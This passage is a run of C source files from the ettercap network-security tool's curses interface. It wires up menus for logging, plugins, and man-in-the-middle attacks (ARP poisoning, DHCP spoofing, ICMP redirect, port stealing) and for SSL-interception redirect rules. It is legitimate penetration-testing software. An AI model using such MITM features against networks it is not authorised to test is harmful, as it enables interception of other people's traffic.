Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /*******************************************/ /* the interface */ void curses_sniff_live(void) { wdg_t *menu; DEBUG_MSG("curses_sniff_live"); wdg_create_object(&menu, WDG_MENU, WDG_OBJ_WANT_FOCUS | WDG_OBJ_ROOT_OBJECT); wdg_set_title(menu, EC_GBL_VERSION, WDG_ALIGN_RIGHT); wdg_set_color(menu, WDG_COLOR_SCREEN, EC_COLOR); wdg_set_color(menu, WDG_COLOR_WINDOW, EC_COLOR_MENU); wdg_set_color(menu, WDG_COLOR_FOCUS, EC_COLOR_FOCUS); wdg_set_color(menu, WDG_COLOR_TITLE, EC_COLOR_TITLE); /* add the menu from external files */ wdg_menu_add(menu, menu_start); wdg_menu_add(menu, menu_targets); if (EC_GBL_SNIFF->type != SM_BRIDGED) wdg_menu_add(menu, menu_hosts); wdg_menu_add(menu, menu_view); if (EC_GBL_SNIFF->type != SM_BRIDGED) wdg_menu_add(menu, menu_mitm); wdg_menu_add(menu, menu_filters); wdg_menu_add(menu, menu_logging); #ifdef HAVE_PLUGINS wdg_menu_add(menu, menu_plugins); #endif wdg_menu_add(menu, menu_help); wdg_draw_object(menu); /* repaint the whole screen */ wdg_redraw_all(); wdg_set_focus(menu); /* add the message flush callback */ wdg_add_idle_callback(curses_flush_msg); /* * give the control to the event dispatcher * with the emergency exit key 'Q' */ wdg_events_handler(CTRL('X')); wdg_destroy_object(&menu); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/curses/ec_curses_logging.c000664 000000 000000 00000010217 13711276346 023526 0ustar00rootroot000000 000000 /* ettercap -- curses GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #define FILE_LEN 40 /* proto */ static void toggle_compress(void); static void curses_log_all(void); static void log_all(void); static void curses_log_info(void); static void log_info(void); static void curses_log_msg(void); static void log_msg(void); static void curses_stop_log(void); static void curses_stop_msg(void); /* globals */ static char tag_compress[] = " "; static char *logfile; struct wdg_menu menu_logging[] = { {"Logging", 'L', "", NULL}, {"Log all packets and infos...", 'I', "I", curses_log_all}, {"Log only infos...", 'i', "i", curses_log_info}, {"Stop logging infos", 0, "", curses_stop_log}, {"-", 0, "", NULL}, {"Log user messages...", 'm', "m", curses_log_msg}, {"Stop logging messages", 0, "", curses_stop_msg}, {"-", 0, "", NULL}, {"Compressed file", 0, tag_compress, toggle_compress}, {NULL, 0, NULL, NULL}, }; /*******************************************/ static void toggle_compress(void) { if (EC_GBL_OPTIONS->compress) { tag_compress[0] = ' '; EC_GBL_OPTIONS->compress = 0; } else { tag_compress[0] = '*'; EC_GBL_OPTIONS->compress = 1; } } /* * display the log dialog */ static void curses_log_all(void) { DEBUG_MSG("curses_log_all"); /* make sure to free if already set */ SAFE_FREE(logfile); SAFE_CALLOC(logfile, FILE_LEN, sizeof(char)); curses_input("Log File :", logfile, FILE_LEN, log_all); } static void log_all(void) { /* a check on the input */ if (strlen(logfile) == 0) { ui_error("Please specify a filename"); return; } set_loglevel(LOG_PACKET, logfile); SAFE_FREE(logfile); } /* * display the log dialog */ static void curses_log_info(void) { DEBUG_MSG("curses_log_info"); /* make sure to free if already set */ SAFE_FREE(logfile); SAFE_CALLOC(logfile, FILE_LEN, sizeof(char)); curses_input("Log File :", logfile, FILE_LEN, log_info); } static void log_info(void) { /* a check on the input */ if (strlen(logfile) == 0) { ui_error("Please specify a filename"); return; } set_loglevel(LOG_INFO, logfile); SAFE_FREE(logfile); } static void curses_stop_log(void) { set_loglevel(LOG_STOP, ""); curses_message("Logging was stopped."); } /* * display the log dialog */ static void curses_log_msg(void) { DEBUG_MSG("curses_log_msg"); /* make sure to free if already set */ SAFE_FREE(logfile); SAFE_CALLOC(logfile, FILE_LEN, sizeof(char)); curses_input("Log File :", logfile, FILE_LEN, log_msg); } static void log_msg(void) { /* a check on the input */ if (strlen(logfile) == 0) { ui_error("Please specify a filename"); return; } set_msg_loglevel(LOG_TRUE, logfile); SAFE_FREE(logfile); } static void curses_stop_msg(void) { set_msg_loglevel(LOG_FALSE, NULL); curses_message("Message logging was stopped."); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/curses/ec_curses_mitm.c000664 000000 000000 00000035157 13711276346 023060 0ustar00rootroot000000 000000 /* ettercap -- curses GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include /* proto */ static void curses_arp_poisoning(void); static void curses_icmp_redir(void); static void curses_port_stealing(void); static void curses_dhcp_spoofing(void); #ifdef WITH_IPV6 static void curses_ndp_poisoning(void); #endif static void curses_start_mitm(void); static void curses_mitm_stop(void); static void curses_sslredir_show(void); static void curses_sslredir_create_lists(void); static void curses_sslredir_destroy(void); static void curses_sslredir_update(void); static void curses_sslredir_add_list(struct redir_entry *re); static void curses_sslredir_add_service(struct serv_entry *se); static void curses_sslredir_add(void *dummy); static void curses_sslredir_add_rule(void); static void curses_sslredir_del(void *dummy); static void curses_sslredir_help(void *dummy); /* globals */ #define PARAMS_LEN 64 #define MAX_DESC_LEN 75 static char params[PARAMS_LEN]; struct wdg_menu menu_mitm[] = { {"Mitm", 'M', "", NULL}, {"ARP poisoning...", 0, "", curses_arp_poisoning}, {"ICMP redirect...", 0, "", curses_icmp_redir}, {"PORT stealing...", 0, "", curses_port_stealing}, {"DHCP spoofing...", 0, "", curses_dhcp_spoofing}, #ifdef WITH_IPV6 {"NDP poisoning...", 0, "", curses_ndp_poisoning}, #endif {"-", 0, "", NULL}, {"Stop mitm attack(s)", 0, "", curses_mitm_stop}, {"-", 0, "", NULL}, {"SSL Intercept", 0, "", curses_sslredir_show}, {NULL, 0, NULL, NULL}, }; static wdg_t *wdg_redirect = NULL; static struct wdg_list *wdg_redirect_elements = NULL; static struct wdg_list *wdg_redirect_services = NULL; static size_t n_redir = 0; static size_t n_serv = 0; static char redir_proto[5] = "ipv4"; static char redir_name[50] = "ftps"; static char redir_destination[MAX_ASCII_ADDR_LEN] = "0.0.0.0/0"; /*******************************************/ static void curses_arp_poisoning(void) { char *method = "arp:"; char *default_param = "remote"; size_t len = strlen(method); DEBUG_MSG("curses_arp_poisoning"); snprintf(params, PARAMS_LEN, "%s%s", method, default_param); curses_input("Parameters :", params + len, PARAMS_LEN - len - 1, curses_start_mitm); } static void curses_icmp_redir(void) { char *method = "icmp:"; size_t len = strlen(method); DEBUG_MSG("curses_icmp_redir"); strncpy(params, method, len); curses_input("Parameters :", params + len, PARAMS_LEN - len - 1, curses_start_mitm); } static void curses_port_stealing(void) { char *method = "port:"; size_t len = strlen(method); DEBUG_MSG("curses_port_stealing"); strncpy(params, method, len); curses_input("Parameters :", params + len, PARAMS_LEN - len - 1, curses_start_mitm); } static void curses_dhcp_spoofing(void) { char *method = "dhcp:"; size_t len = strlen(method); DEBUG_MSG("curses_dhcp_spoofing"); strncpy(params, method, len); curses_input("Parameters :", params + len, PARAMS_LEN - len - 1, curses_start_mitm); } #ifdef WITH_IPV6 static void curses_ndp_poisoning(void) { char *method = "ndp:"; char *default_param = "remote"; size_t len = strlen(method); DEBUG_MSG("curses_ndp_poisoning"); snprintf(params, PARAMS_LEN, "%s%s", method, default_param); curses_input("Parameters :", params + len, PARAMS_LEN - len - 1, curses_start_mitm); } #endif /* * start the mitm attack by passing the name and parameters */ static void curses_start_mitm(void) { DEBUG_MSG("curses_start_mitm"); mitm_set(params); mitm_start(); } /* * stop all the mitm attack(s) */ static void curses_mitm_stop(void) { wdg_t *dlg; DEBUG_MSG("curses_mitm_stop"); /* create the dialog */ wdg_create_object(&dlg, WDG_DIALOG, WDG_OBJ_WANT_FOCUS); wdg_set_color(dlg, WDG_COLOR_SCREEN, EC_COLOR); wdg_set_color(dlg, WDG_COLOR_WINDOW, EC_COLOR); wdg_set_color(dlg, WDG_COLOR_FOCUS, EC_COLOR_FOCUS); wdg_set_color(dlg, WDG_COLOR_TITLE, EC_COLOR_TITLE); wdg_dialog_text(dlg, WDG_NO_BUTTONS, "Stopping the mitm attack..."); wdg_draw_object(dlg); wdg_set_focus(dlg); wdg_update_screen(); /* stop the mitm process */ mitm_stop(); wdg_destroy_object(&dlg); curses_message("MITM attack(s) stopped"); } /* * build SSL Redir window */ static void curses_sslredir_show(void) { DEBUG_MSG("curses_sslredir_show()"); /* create the array for the list widget */ curses_sslredir_create_lists(); /* if the object already exists, set the focus to it */ if (wdg_redirect) { /* set the new array */ wdg_list_set_elements(wdg_redirect, wdg_redirect_elements); return; } wdg_create_object(&wdg_redirect, WDG_LIST, WDG_OBJ_WANT_FOCUS); wdg_set_size(wdg_redirect, 1, 2, -1, SYSMSG_WIN_SIZE - 1); wdg_set_title(wdg_redirect, "Delete or Insert SSL Intercept rules", WDG_ALIGN_LEFT); wdg_set_color(wdg_redirect, WDG_COLOR_SCREEN, EC_COLOR); wdg_set_color(wdg_redirect, WDG_COLOR_WINDOW, EC_COLOR); wdg_set_color(wdg_redirect, WDG_COLOR_BORDER, EC_COLOR_BORDER); wdg_set_color(wdg_redirect, WDG_COLOR_FOCUS, EC_COLOR_FOCUS); wdg_set_color(wdg_redirect, WDG_COLOR_TITLE, EC_COLOR_TITLE); /* set the elements */ wdg_list_set_elements(wdg_redirect, wdg_redirect_elements); /* add the destroy callback */ wdg_add_destroy_key(wdg_redirect, KEY_ESC, curses_sslredir_destroy); /* add the insert and delete callback */ wdg_list_add_callback(wdg_redirect, KEY_IC, curses_sslredir_add); wdg_list_add_callback(wdg_redirect, KEY_DC, curses_sslredir_del); wdg_list_add_callback(wdg_redirect, ' ', curses_sslredir_help); wdg_draw_object(wdg_redirect); wdg_set_focus(wdg_redirect); } static void curses_sslredir_destroy(void) { wdg_redirect = NULL; } static void curses_sslredir_help(void *dummy) { /* varable not used */ (void) dummy; char help[] = "HELP: shortcut list:\n\n" " INSERT - insert a new redirect rule\n" " DELETE - delete a redirect rule"; curses_message(help); } /* * dialog to add new redirect rule */ static void curses_sslredir_add(void *dummy) { wdg_t *wdg_input; DEBUG_MSG("curses_sslredir_add()"); /* unused variable */ (void) dummy; wdg_create_object(&wdg_input, WDG_INPUT, WDG_OBJ_WANT_FOCUS | WDG_OBJ_FOCUS_MODAL); wdg_set_color(wdg_input, WDG_COLOR_SCREEN, EC_COLOR); wdg_set_color(wdg_input, WDG_COLOR_WINDOW, EC_COLOR); wdg_set_color(wdg_input, WDG_COLOR_FOCUS, EC_COLOR_FOCUS); wdg_set_color(wdg_input, WDG_COLOR_TITLE, EC_COLOR_MENU); wdg_input_size(wdg_input, strlen("Destination: ") + MAX_ASCII_ADDR_LEN, 6); wdg_input_add(wdg_input, 1, 1, "IP Version: ", redir_proto, 5, 1); wdg_input_add(wdg_input, 1, 3, "Server IP: ", redir_destination, MAX_ASCII_ADDR_LEN, 1); wdg_input_add(wdg_input, 1, 4, "Service: ", redir_name, 10, 1); wdg_input_set_callback(wdg_input, curses_sslredir_add_rule); wdg_draw_object(wdg_input); wdg_set_focus(wdg_input); } /* * callback inserting the actual rule */ static void curses_sslredir_add_rule(void) { int ret; size_t len, new_len, i = 0; struct serv_entry *se = NULL; ec_redir_proto_t proto; char *services_available = NULL; DEBUG_MSG("curses_sslredir_add_rule()"); /* check ip version string */ if (!strcasecmp(redir_proto, "ipv4")) proto = EC_REDIR_PROTO_IPV4; else if (!strcasecmp(redir_proto, "ipv6")) proto = EC_REDIR_PROTO_IPV6; else { DEBUG_MSG("curses_sslredir_add_rule(): '%s' invalid IP version string", redir_proto); #ifdef WITH_IPV6 curses_message("Invalid IP version string. Use either \"ipv4\" or " "\"ipv6\".\n"); #else curses_message("Invalid IP version string. Use \"ipv4\".\n"); #endif return; } /* check service name */ if (wdg_redirect_services == NULL) { DEBUG_MSG("curses_sslredir_add_rule(): " "no redirect services registered"); INSTANT_USER_MSG("No redirect services registered. " "Is SSL redirection enabled in etter.conf?"); return; } while (wdg_redirect_services[i].desc != NULL) { if (!strcasecmp(redir_name, wdg_redirect_services[i].desc)) { se = (struct serv_entry *) wdg_redirect_services[i].value; break; } i++; } /* redirect name not found - display available redirects */ if (se == NULL) { services_available = strdup("Services available: \n"); for (i=0; i < n_serv; i++) { len = strlen(services_available); new_len = len+strlen(wdg_redirect_services[i].desc)+4+1; SAFE_REALLOC(services_available, new_len); snprintf(services_available+len, new_len, " * %s\n", wdg_redirect_services[i].desc); } curses_message(services_available); SAFE_FREE(services_available); return; } /* do the actual redirect insertion */ ret = ec_redirect(EC_REDIR_ACTION_INSERT, se->name, proto, redir_destination, se->from_port, se->to_port); /* inform user if redirect insertion wasn't successful */ if (ret != E_SUCCESS) { DEBUG_MSG("calling ec_redirect('%s', '%s', '%s', '%s', '%d', '%d'" " failed", "insert", se->name, redir_proto, redir_destination, se->from_port, se->to_port); INSTANT_USER_MSG("Inserting redirect for %s/%s failed!\n", redir_proto, redir_name); } /* update redirect list */ curses_sslredir_update(); } /* * callback to delete a certain redirect rule */ static void curses_sslredir_del(void *dummy) { struct redir_entry *re; int ret; DEBUG_MSG("curses_sslredir_del()"); /* prevent the selection when the list is empty */ if (dummy == NULL) return; /* remove the redirect */ re = (struct redir_entry *)dummy; ret = ec_redirect(EC_REDIR_ACTION_REMOVE, re->name, re->proto, re->destination, re->from_port, re->to_port); if (ret != E_SUCCESS) { DEBUG_MSG("calling ec_redirect('%s', '%s', '%s', '%s', '%d', '%d'" " failed", "remove", re->name, (re->proto == EC_REDIR_PROTO_IPV4 ? "ipv4" : "ipv6"), re->destination, re->from_port, re->to_port); INSTANT_USER_MSG("Removing redirect for %s/%s failed!\n", (re->proto == EC_REDIR_PROTO_IPV4 ? "ipv4" : "ipv6"), re->name); return; } curses_sslredir_update(); } static void curses_sslredir_create_lists(void) { int res, i = 0; DEBUG_MSG("curses_sslredir_create_lists()"); /* free the array (if allocated */ while (wdg_redirect_elements && wdg_redirect_elements[i].desc != NULL) { SAFE_FREE(wdg_redirect_elements[i].desc); i++; } SAFE_FREE(wdg_redirect_elements); n_redir = 0; /* walk through the redirect rules */ ec_walk_redirects(&curses_sslredir_add_list); /* services are only gathered once */ if (wdg_redirect_services != NULL) return; /* walk through the registered services */ res = ec_walk_redirect_services(&curses_sslredir_add_service); if (res == -E_NOTFOUND) { SAFE_CALLOC(wdg_redirect_elements, 1, sizeof(struct wdg_list)); wdg_redirect_elements->desc = "No rules found. " "Redirects may be not enabled in etter.conf?"; } } static void curses_sslredir_add_list(struct redir_entry *re) { /* enlarge the array */ SAFE_REALLOC(wdg_redirect_elements, (n_redir+1) * sizeof(struct wdg_list)); /* fill the element */ SAFE_CALLOC(wdg_redirect_elements[n_redir].desc, MAX_DESC_LEN, sizeof(char)); snprintf(wdg_redirect_elements[n_redir].desc, MAX_DESC_LEN, "%s %30s %s", (re->proto == EC_REDIR_PROTO_IPV4 ? "ipv4" : "ipv6"), re->destination, re->name); wdg_redirect_elements[n_redir].value = re; n_redir++; /* allocate new entry in list to move the NULL element */ SAFE_REALLOC(wdg_redirect_elements, (n_redir+1) * sizeof(struct wdg_list)); wdg_redirect_elements[n_redir].desc = NULL; wdg_redirect_elements[n_redir].value = NULL; } /* * populate array for available services */ static void curses_sslredir_add_service(struct serv_entry *se) { DEBUG_MSG("curses_sslredir_add_service()"); /* enlarge the array */ SAFE_REALLOC(wdg_redirect_services, (n_serv+1) * sizeof(struct wdg_list)); /* fill the element */ SAFE_CALLOC(wdg_redirect_services[n_serv].desc, MAX_DESC_LEN, sizeof(char)); snprintf(wdg_redirect_services[n_serv].desc, MAX_DESC_LEN, "%s", se->name); wdg_redirect_services[n_serv].value = se; n_serv++; /* allocate new entry in list to move the NULL element */ SAFE_REALLOC(wdg_redirect_services, (n_serv+1) * sizeof(struct wdg_list)); wdg_redirect_services[n_serv].desc = NULL; wdg_redirect_services[n_serv].value = NULL; } /* * refresh redirects list */ static void curses_sslredir_update(void) { int i = 0; DEBUG_MSG("curses_sslredir_update()"); /* rebuild array */ while (wdg_redirect_elements && wdg_redirect_elements[i].desc != NULL) { SAFE_FREE(wdg_redirect_elements[i].desc); i++; } SAFE_FREE(wdg_redirect_elements); n_redir = 0; ec_walk_redirects(&curses_sslredir_add_list); /* NULL terminate the array in case it's empty */ if (wdg_redirect_elements == NULL) { SAFE_CALLOC(wdg_redirect_elements, 1, sizeof(struct wdg_list)); wdg_redirect_elements[0].desc = NULL; wdg_redirect_elements[0].value = NULL; } /* refresh list widget */ wdg_list_set_elements(wdg_redirect, wdg_redirect_elements); wdg_list_refresh(wdg_redirect); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/curses/ec_curses_offline.c000664 000000 000000 00000003754 13711276346 023532 0ustar00rootroot000000 000000 /* ettercap -- curses GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /*******************************************/ /* the interface */ void curses_sniff_offline(void) { wdg_t *menu; DEBUG_MSG("curses_sniff_offline"); wdg_create_object(&menu, WDG_MENU, WDG_OBJ_WANT_FOCUS | WDG_OBJ_ROOT_OBJECT); wdg_set_title(menu, EC_GBL_VERSION, WDG_ALIGN_RIGHT); wdg_set_color(menu, WDG_COLOR_SCREEN, EC_COLOR); wdg_set_color(menu, WDG_COLOR_WINDOW, EC_COLOR_MENU); wdg_set_color(menu, WDG_COLOR_FOCUS, EC_COLOR_FOCUS); wdg_set_color(menu, WDG_COLOR_TITLE, EC_COLOR_TITLE); /* add the menu from the external files */ wdg_menu_add(menu, menu_start); wdg_menu_add(menu, menu_targets); wdg_menu_add(menu, menu_view); wdg_menu_add(menu, menu_filters); wdg_menu_add(menu, menu_logging); wdg_menu_add(menu, menu_help); wdg_draw_object(menu); /* repaint the whole screen */ wdg_redraw_all(); wdg_set_focus(menu); /* add the message flush callback */ wdg_add_idle_callback(curses_flush_msg); /* * give the control to the event dispatcher * with the emergency exit CTRL + X */ wdg_events_handler(CTRL('X')); wdg_destroy_object(&menu); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/curses/ec_curses_plugins.c000664 000000 000000 00000021620 13711276346 023561 0ustar00rootroot000000 000000 /* ettercap -- curses GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #define MAX_DESC_LEN 75 /* proto */ static void curses_plugin_mgmt(void); static void curses_plugin_load(void); static void curses_load_plugin(const char *path, char *file); static void curses_wdg_plugin(char active, struct plugin_ops *ops); static void curses_refresh_plug_array(char active, struct plugin_ops *ops); static void curses_plug_destroy(void); static void curses_select_plugin(void *plugin); static int curses_start_plugin(char *plugin); static void curses_create_plug_array(void); static void curses_plugin_help(void *dummy); /* globals */ static wdg_t *wdg_plugin; static struct wdg_list *wdg_plugin_elements; static size_t nplug; struct wdg_menu menu_plugins[] = { {"Plugins", 'P', "", NULL}, {"Manage the plugins", CTRL('P'), "C-p", curses_plugin_mgmt}, {"Load a plugin...", 0, "", curses_plugin_load}, {NULL, 0, NULL, NULL}, }; /* mutexes */ static pthread_mutex_t pluginlist_mutex = PTHREAD_MUTEX_INITIALIZER; /*******************************************/ /* * display the file open dialog */ static void curses_plugin_load(void) { wdg_t *fop; DEBUG_MSG("curses_plugin_load"); wdg_create_object(&fop, WDG_FILE, WDG_OBJ_WANT_FOCUS | WDG_OBJ_FOCUS_MODAL); wdg_set_title(fop, "Select a plugin...", WDG_ALIGN_LEFT); wdg_set_color(fop, WDG_COLOR_SCREEN, EC_COLOR); wdg_set_color(fop, WDG_COLOR_WINDOW, EC_COLOR_MENU); wdg_set_color(fop, WDG_COLOR_FOCUS, EC_COLOR_FOCUS); wdg_set_color(fop, WDG_COLOR_TITLE, EC_COLOR_TITLE); wdg_file_set_callback(fop, curses_load_plugin); wdg_draw_object(fop); wdg_set_focus(fop); } static void curses_load_plugin(const char *path, char *file) { int ret; DEBUG_MSG("curses_load_plugin %s/%s", path, file); /* load the plugin */ ret = plugin_load_single(path, file); /* check the return code */ switch (ret) { case E_SUCCESS: curses_message("Plugin loaded successfully"); break; case -E_DUPLICATE: ui_error("plugin %s already loaded...", file); break; case -E_VERSION: ui_error("plugin %s was compiled for a different ettercap version...", file); break; case -E_INVALID: default: ui_error("Cannot load the plugin...\nthe file may be an invalid plugin\nor you don't have the permission to open it"); break; } } /* * plugin management */ static void curses_plugin_mgmt(void) { DEBUG_MSG("curses_plugin_mgmt"); /* create the array for the list widget */ curses_create_plug_array(); /* if the object already exist, set the focus to it */ if (wdg_plugin) { /* set the new array */ wdg_list_set_elements(wdg_plugin, wdg_plugin_elements); return; } wdg_create_object(&wdg_plugin, WDG_LIST, WDG_OBJ_WANT_FOCUS); wdg_set_size(wdg_plugin, 1, 2, -1, SYSMSG_WIN_SIZE - 1); wdg_set_title(wdg_plugin, "Select a plugin...", WDG_ALIGN_LEFT); wdg_set_color(wdg_plugin, WDG_COLOR_SCREEN, EC_COLOR); wdg_set_color(wdg_plugin, WDG_COLOR_WINDOW, EC_COLOR); wdg_set_color(wdg_plugin, WDG_COLOR_BORDER, EC_COLOR_BORDER); wdg_set_color(wdg_plugin, WDG_COLOR_FOCUS, EC_COLOR_FOCUS); wdg_set_color(wdg_plugin, WDG_COLOR_TITLE, EC_COLOR_TITLE); /* set the elements */ wdg_list_set_elements(wdg_plugin, wdg_plugin_elements); /* add the destroy callback */ wdg_add_destroy_key(wdg_plugin, CTRL('Q'), curses_plug_destroy); /* add the callback */ wdg_list_select_callback(wdg_plugin, curses_select_plugin); wdg_list_add_callback(wdg_plugin, ' ', curses_plugin_help); wdg_draw_object(wdg_plugin); wdg_set_focus(wdg_plugin); } static void curses_plug_destroy(void) { wdg_plugin = NULL; } static void curses_plugin_help(void *dummy) { /* variable not used */ (void) dummy; char help[] = "HELP: shortcut list:\n\n" " ENTER - activate/deactivate a plugin"; curses_message(help); } /* * create the array for the widget. * erase any previously alloc'd array */ static void curses_create_plug_array(void) { int res, i = 0; DEBUG_MSG("curses_create_plug_array"); /* free the array (if alloc'ed) */ while (wdg_plugin_elements && wdg_plugin_elements[i].desc != NULL) { SAFE_FREE(wdg_plugin_elements[i].desc); i++; } SAFE_FREE(wdg_plugin_elements); nplug = 0; /* go thru the list of plugins */ res = plugin_list_walk(PLP_MIN, PLP_MAX, &curses_wdg_plugin); if (res == -E_NOTFOUND) { SAFE_CALLOC(wdg_plugin_elements, 1, sizeof(struct wdg_list)); wdg_plugin_elements->desc = "No plugin found !"; } } /* * refresh the array (the array must be pre-alloc'd) */ static void curses_refresh_plug_array(char active, struct plugin_ops *ops) { /* refresh the description */ snprintf(wdg_plugin_elements[nplug].desc, MAX_DESC_LEN, "[%d] %15s %4s %s", active, ops->name, ops->version, ops->info); nplug++; } /* * callback function for displaying the plugin list */ static void curses_wdg_plugin(char active, struct plugin_ops *ops) { /* enlarge the array */ SAFE_REALLOC(wdg_plugin_elements, (nplug + 1) * sizeof(struct wdg_list)); /* fill the element */ SAFE_CALLOC(wdg_plugin_elements[nplug].desc, MAX_DESC_LEN + 1, sizeof(char)); snprintf(wdg_plugin_elements[nplug].desc, MAX_DESC_LEN, "[%d] %15s %4s %s", active, ops->name, ops->version, ops->info); wdg_plugin_elements[nplug].value = ops->name; nplug++; /* null terminate the array */ SAFE_REALLOC(wdg_plugin_elements, (nplug + 1) * sizeof(struct wdg_list)); wdg_plugin_elements[nplug].desc = NULL; wdg_plugin_elements[nplug].value = NULL; } /* * callback function for a plugin */ static void curses_select_plugin(void *plugin) { /* start or stop the plugin */ curses_start_plugin(plugin); /* refresh the array for the list widget */ curses_plugins_update(); } /* * toggle the state of a plugin */ static int curses_start_plugin(char *plugin) { int ret; /* prevent the selection when the list is empty */ if (plugin == NULL) return -E_NOTHANDLED; /* print the message */ if (plugin_is_activated(plugin) == 0) INSTANT_USER_MSG("Activating %s plugin...\n", plugin); else INSTANT_USER_MSG("Deactivating %s plugin...\n", plugin); /* * pay attention on this ! * if the plugin init does not return, * we are blocked here. So it is encouraged * to write plugins which spawn a thread * and immediately return */ if (plugin_is_activated(plugin) == 1) ret = plugin_fini(plugin); else ret = plugin_init(plugin); return ret; } void curses_plugins_update(void) { DEBUG_MSG("curses_plugins_update"); CURSES_LOCK(pluginlist_mutex); /* refres the array for the list widget */ nplug = 0; plugin_list_walk(PLP_MIN, PLP_MAX, &curses_refresh_plug_array); /* refresh the list */ wdg_list_refresh(wdg_plugin); CURSES_UNLOCK(pluginlist_mutex); } /* * check if plugins have been provided on CLI * and try to start all provided plugins */ void curses_autostart_plugins(void) { struct plugin_list *plugin, *tmp; DEBUG_MSG("curses_autostart_plugins()"); /* if plugins have been defined on the CLI */ if (!LIST_EMPTY(&EC_GBL_OPTIONS->plugins)) { LIST_FOREACH_SAFE(plugin, &EC_GBL_OPTIONS->plugins, next, tmp) { /* first check if the plugin exists */ if (search_plugin(plugin->name) != E_SUCCESS) { plugin->exists = false; USER_MSG("Sorry, plugin '%s' can not be found - skipping\n\n", plugin->name); } else { /* now we can try to start the plugin */ plugin->exists = true; if (curses_start_plugin(plugin->name) != PLUGIN_RUNNING) { USER_MSG("Plugin '%s' can not be started - skipping\n\n", plugin->name); } } } } } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/curses/ec_curses_start.c000664 000000 000000 00000003513 13711276346 023236 0ustar00rootroot000000 000000 /* ettercap -- curses GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /* proto */ static void curses_start_sniffing(void); static void curses_stop_sniffing(void); /* globals */ struct wdg_menu menu_start[] = { {"Start", 'S', "", NULL}, {"Start sniffing", CTRL('W'), "C-w", curses_start_sniffing}, {"Stop sniffing", CTRL('E'), "C-e", curses_stop_sniffing}, {"-", 0, "", NULL}, {"Exit", CTRL('X'), "C-x", wdg_exit}, {NULL, 0, NULL, NULL}, }; /*******************************************/ static void curses_start_sniffing(void) { DEBUG_MSG("curses_start_sniffing"); /* start the sniffing method */ EXECUTE(EC_GBL_SNIFF->start); } static void curses_stop_sniffing(void) { DEBUG_MSG("curses_stop_sniffing"); /* terminate the sniffing engine */ EXECUTE(EC_GBL_SNIFF->cleanup); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/curses/ec_curses_targets.c000664 000000 000000 00000031217 13711276346 023554 0ustar00rootroot000000 000000 /* ettercap -- curses GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /* proto */ static void toggle_reverse(void); static void curses_select_protocol(void); static void set_protocol(void); static void wipe_targets(void); static void curses_select_targets(void); static void set_targets(void); static void curses_current_targets(void); static void curses_destroy_tsel(void); static void curses_create_targets_array(void); static void curses_delete_target1(void *); static void curses_delete_target2(void *); static void curses_add_target1(void *); static void curses_add_target2(void *); static void add_target1(void); static void add_target2(void); static void curses_target_help(void); /* globals */ static wdg_t *wdg_comp; static wdg_t *wdg_t1, *wdg_t2; static struct wdg_list *wdg_t1_elm, *wdg_t2_elm; static char thost[MAX_ASCII_ADDR_LEN]; static char tag_reverse[] = " "; struct wdg_menu menu_targets[] = { {"Targets", 'T', "", NULL}, {"Current Targets", 't', "t", curses_current_targets}, {"Select TARGET(s)", CTRL('T'), "C-t", curses_select_targets}, {"-", 0, "", NULL}, {"Protocol...", 'p', 